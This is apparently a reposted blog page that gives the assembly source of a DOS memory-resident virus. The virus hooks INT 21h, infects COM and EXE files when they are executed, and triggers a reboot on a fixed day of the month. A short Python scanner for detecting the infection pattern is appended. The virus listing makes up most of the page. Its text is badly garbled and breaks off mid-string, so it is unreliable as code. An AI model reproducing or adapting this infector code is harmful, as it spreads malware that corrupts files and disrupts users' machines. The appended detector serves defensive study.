Resident Virus under a DOS DEMO

xiaoxiao, 2021-03-06


*****************************************; * a dos computer virus * ; * Name: prc virus *; * Infest Com or Exe file in dos system *; * Completed on May 2, 2000 *; ********************** *****************; *************************************** *************; * Save registers *; **************************************** ************ PUSHALL MACRO PUSH AX PUSH BX PUSH CX Push DX Push Si Push Di Push BP Push DS Push Esendm; *************** **************************; * RESTORE registers *; **************** *********************************** POPALL MACRO POP ES POP DS POP Pop Di Pop Si Pop DX Pop CX Pop Bx Pop Axendm; *** ***************************************; * My program start *; *** ************************************************ Code Segmentassume CS: CODE, DS: CODE

ORG 100HSTART: PUSH DS PUSH ES CALL BaseAddr; Si Saves The Base AddressBaseAddr: Pop Si Mov Ah, 2AH INT 21H CMP DL, 03H JNZ DonodAmage; ****************** ***************; * You can write Damage code Here *; *************** *********************************** MOV AH, 09H PUSH CS Pop DS Lea DX, [MSG-BaseAddr] [Si] Int 21h MOV AH 08H INT 21h INT 19H; *************************************************************** **; * if it is not the right day, do no damage *; ****************************************** *********** DONODAMAGE: CMP BYTE PTR CS: [COMOREXE-BaseAddr] [Si], Exefile JZ NOTESTOREFILEHEADER; ****************** ****************; * RESTORE Comfile header *; ****************** ************************ MOV CX, Word PTR CS: [SAVETHREEBYTES-BASEADDR] [Si] MOV DS: [100H], CX MOV CL , CS: [SAVETHREEBYTES 2-BaseAddr] [Si] MOV DS: [102H], ClNotrestorefileHeader: MOV AX, CS Add Word PTR CS: [Executeorgfile-BaseAddr 3] [Si], AX; Set Original Exefile Entrance Address XOR AX, AX MOV DS, AX MOV BX, DS: [21h * 4] Push DS: [21h * 4 2] POP ​​DS CMP BYTE PTR [BX], 90H; Check if the Virus Code Is in Memory or Not Jz Stoploading; ****** ***************************************; * Modify MCB to make room for the program *; ****************************************** MOV DX , ES DEC DX MOV DS, DX MOV AX, DS: [3] MOV BX, (Myvirussize 15) / 16 CMP AX, BX JB Stoploading Sub AX, BX MOV DS: [3], AX Add DX, AX INC DX ******************************************; * COPY THE Virus Code INTO MEMORY *; *************************************************** PUSH CS POP DS MOV ES, DX MOV BX, Si; Save Base Address Mov CX, Myvirussize Sub Si, BaseAddr-Start XOR DI, DI CLD Rep MOVSB; ********************* **********************;

* Modify Interrupt Vector Table *; *************************************************** XOR AX, AX MOV DS, AX PUSH DS: [21H * 4] POP ​​Word PTR ES: [Oldint21H-100H] Push DS: [21h * 4 2] Pop Word PTR ES: [Oldint 21h 2-100h] MOV AX , 2521H SUB DX, 10H MOV DS, DX MOV DX, OFFSET RESIDENTPART INT 21H; ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ --------- Stockloading: POP ES POP DSEXECUTEORGFILE:; Execute The Parasided EXE OR COM FILE RET DD 0; *********************** **********************************; * The Following Program Is ResiDent in Memory *; **** *********************************************************** *** ResidentPart: NOP; NOP IS The Signal of Residence of Virus CPMP AH, 4BH JZ Infect JMP CS: Oldint21HINFECT: PUSHALL; ************************* ********************** * Judge the file is a comfile or exec *; ******* ******************************************* MOV Al, '. 'MOV DI, DX MOV CX, 0FFFH Rep Scasb or Byte Ptr [Di], 20H MOV CS: COMOREXE, 0 CMP BYTE PTR [DI],' C ' JZ Lab1 Inc CS: ​​COMOREXELAB1:; **************************************************** ***************; * RESTORE 21H Interrupt Vector to Use Int 21h recommended *; ********************** *********************************** PUSH DS XOR AX, AX MOV DS, AX Push Word PTR CS: [Oldint21h] POP ​​DS: [21h * 4] Push Word PTR CS: [Oldint 21h 2] POP ​​DS: [21h * 4 2]; ***************** ****************; * Hook 24h to mask error process *; ************** *************************** PUSH DS: [24h * 4] Pop Word PTR CS: [Oldint24h] Push DS: [24h * 4 2] POP ​​Word PTR CS: [Oldint24H 2] MOV DS: [24h * 4], Offset Newint24h MOV AX, CS MOV DS: [24H * 4 2], AX Pop DS; ****** ***********************************

* Modify File Attribute *; *********************************************************** MOV AX, 4300H INT 21H JNC LAB2 JMP Endinfection3LAB2: PUSH CX; Remember to Pop IT OR CL, CX MOV AX, 4301H INT 21H JNC LAB3 JMP endinfection2; ************* *******************************; * Open the file *; *********** **************************************** LAB3: MOV AX, 3D42H INT 21H JNC LAB4 JMP endInfection2; ****** **************************; * Load file header *; ****** ********************************************** LAB4: MOV BX, AX Push DS; Remember to POP IT PUSH DX; Remember to POP IT MOV BP, SP SUB BP, 60H MOV DX, BP PUSH SS POP DS MOV CX, 1CH MOV AH, 3FH INT 21H; *************** **************************; * Get the file size *; ************** **************************** MOV AX, 4202H MOV CX, 0FFFFH MOV DX, -4 INT 21h Add Ax, 4 ADC DX, 0 Push AX Push DX; **************************************************** ; * Read Four Last Bytes of the file *; ************************************************* **** MOV AH, 3FH MOV CX, 4 LEA DX, [BP 1CH] INT 21h Pop DX POP AX; *********************** **********; * check if the file is infected or not *; ****************** ************************* PUSH CS Pop Es Lea Si, [BP 1CH] MOV DI, Offset Checkstring Mov CX, CheckstringLENT CLD Rep CMPSB JNZ Lab5 JMP endinfection1; *****************************************; * SAVE THE FIRST Three Bytes of the File *; ***************************************** ** LAB5: MOV CX, [BP] MOV Word PTR CS: Savethreebytes, CX MOV CL, [BP 02H] MOV CS: Savethreebytes 2, CMP CS: COMOREXE, EXEFILE JZ INFECTEXEFILE

*********************************; * DEAL with Comfile *; ********************************; push_ax_dx: Push AX Push DX MOV BYTE PTR [BP], 0E9H SUB AX, 3 MOV [BP 1], AX MOV DX, 100H XOR AX, AX JMP WRITECODE; ******************* ***************; * DEAL with EXEFILE *; ********************* *********************** Infectexefile: Mov Si, Ax; Compute How Many Bytes Needed to Align Para and Si, 0FH MOV CX, 16 SUB CX, Si and CX, 0FH MOV SI, CX Add Ax, CX ADC DX, 0; Push_ax_dx Push AX Push DX MOV CX, 16 DIV CX Sub AX, [BP 08H] SUB AX, 16; Compute New Code Segment XCHG [BP 16h], AX; Exchange New Code Segment and Old Code Segment MOV DX, [BP 14H]; Save Old Entry IP MOV WORD PTR [BP 14H], 100H; New IP = 100H SUB AX, [BP 16H]; Compute Difference Between Old Segment and New Segment; ****************************************************************************************************** **; * append the exec to align para *; *************************************** *************** PUSH AX MOV CX, SI JCXZ Writecode Mov AH, 40H INT 21h Pop AX; ****************** ****************; * WRITE The code INTO the file *; *************** *************************** WRITECODE: PUSH CS POP DS MOV BYTE PTECUTEORGFILE, 0EAH; Build The Instruction of "JMP xxxx: xxxx "MOV Word PTR EXECUTEORGFILE 1, DX; in ORDER TO EXECUTE THE ORINGAL FILE MOV WORD PTR EXECUTEORGFILE 3, AX MOV DX, 100H MOV CX, MyVirussize MOV AH, 40H INT 21h; ********* ***********************; * modify the exec, header *; ********** ******************************************* MOV AX, 4200H XOR CX, CX XOR DX, DX INT 21H;

------------------------------------------ POP_DX_AX: POP DX; POP TO Balance The Stack Pop AX; ---------------------------------------- CMP CS: COMOREXE, Comfile Jz Lab6 Add Ax, Myvirussize; Compute How Many Sectors The File Occupied ADC DX, 0 MOV CX, 512 DIV CX Inc AX MOV [BP 04H], AX MOV [BP 02H], DXLAB6: PUSH SS POP DS MOV AH, 40H MOV DX, BP MOV CX, 1CH INT 21H; ********************************************* *********; * Infection done *; ****************************************** ********* Endinfection1: POP DX POP Dsendinfection2: POP CX; ****************************************** ************; * close the file *; ***************************************** *********** MOV AH, 3EH INT 21h; ******************************************* ***********; * restore the file attribute *; *************************************** ************* Endinfection3: MOV AX, 4301H INT 21h; *************************************** *************; * let int 21h recommended point *; ************ *********************************************** XOR AX, AX MOV DS, AX MOV DS: [ 21h * 4], Offset ResidentPart Push CS Pop DS: [21h * 4 2]; **************************************** ********************; * RESTORE INT 24h *; ********************** ************************** PUSH WORD PTR CS: [Oldint24h] POP ​​DS: [24h * 4] Push Word PTR CS: [Oldint24h 2] POP ​​DS: [24H * 4 2] popall jmp dword PTR CS: Oldint21hnewint24h: Iret; ************************************** ***************; * Data Area *; *********************************** ************** Oldint21h DD? Oldint24h DD? COMOREXE DB? MSG DB 'this is a dos computer virus!', 0DH, 0AH, '$' Savethreebytes db 1eh, 06h, 0e8h Checkstring db '
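The scanner below is an added defensive example, not part of the original listing: it parses the two entry-point changes the virus makes (a leading JMP rel16 in COM files, and an EXE header whose CS is moved so that CS:100h addresses the appended code) and flags images whose first executed instruction lands in a short tail at the end of the file. The Checkstring marker is cut off on this page, so the check relies on entry-point geometry instead; TAIL_LIMIT and the sample images are constructed assumptions.

```python
import struct

TAIL_LIMIT = 4096  # assumed upper bound on an appended parasite; tune per environment

def entry_offset(data: bytes):
    """Return (kind, file offset of the first executed instruction) for a DOS image.

    EXE: entry = header size + CS*16 + IP, all taken from the MZ header.
    COM: loaded at 100h; a leading JMP rel16 (E9 disp) lands at file offset 3 + disp.
    """
    if len(data) >= 0x1C and data[:2] == b"MZ":
        cparhdr = struct.unpack_from("<H", data, 0x08)[0]   # header size in paragraphs
        ip, cs = struct.unpack_from("<HH", data, 0x14)       # e_ip, e_cs
        return "exe", cparhdr * 16 + cs * 16 + ip
    if len(data) >= 3 and data[0] == 0xE9:
        disp = struct.unpack_from("<H", data, 1)[0]
        return "com", (3 + disp) & 0xFFFF
    return "com", 0

def looks_appended(data: bytes) -> bool:
    """Flag images whose entry point was redirected into a short tail at end of file."""
    kind, entry = entry_offset(data)
    tail = len(data) - entry
    if kind == "exe":
        ip = struct.unpack_from("<H", data, 0x14)[0]
        return ip == 0x100 and 0 < tail <= TAIL_LIMIT   # CS moved so CS:100h is the tail
    return entry > 0 and 0 < tail <= TAIL_LIMIT

def _mz(cs: int, ip: int, body: bytes, cparhdr: int = 2) -> bytes:
    """Constructed minimal MZ image: cparhdr*16-byte header followed by body."""
    total = cparhdr * 16 + len(body)
    hdr = bytearray(cparhdr * 16)
    struct.pack_into("<2sHHHH", hdr, 0, b"MZ", total % 512, (total + 511) // 512, 0, cparhdr)
    struct.pack_into("<HH", hdr, 0x14, ip, cs)
    return bytes(hdr) + body

# Constructed samples (not from the page). _TAIL stands in for appended code.
_ORIG_COM = bytes.fromhex("b409ba0801cd21c3") + b"hi$"   # 11-byte toy COM program
_TAIL = b"\x90" * 64
CLEAN_COM = _ORIG_COM
# COM scheme from the listing: first three bytes become JMP (E9, size-3), code appended.
INFECTED_COM = b"\xe9" + struct.pack("<H", len(_ORIG_COM) - 3) + _ORIG_COM[3:] + _TAIL
_BODY = bytes(2000)                                      # already paragraph-aligned
CLEAN_EXE = _mz(cs=0, ip=0, body=_BODY)
# EXE scheme from the listing: new CS = aligned size/16 - header paras - 16, IP = 100h.
_NEW_CS = (32 + len(_BODY)) // 16 - 2 - 16
INFECTED_EXE = _mz(cs=_NEW_CS, ip=0x100, body=_BODY + _TAIL)
```

A legitimate small COM that begins with a forward JMP can trip the COM heuristic, so treat a hit as a triage signal rather than a verdict.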

Please credit the original source when reposting: https://www.9cbs.com/read-51421.html
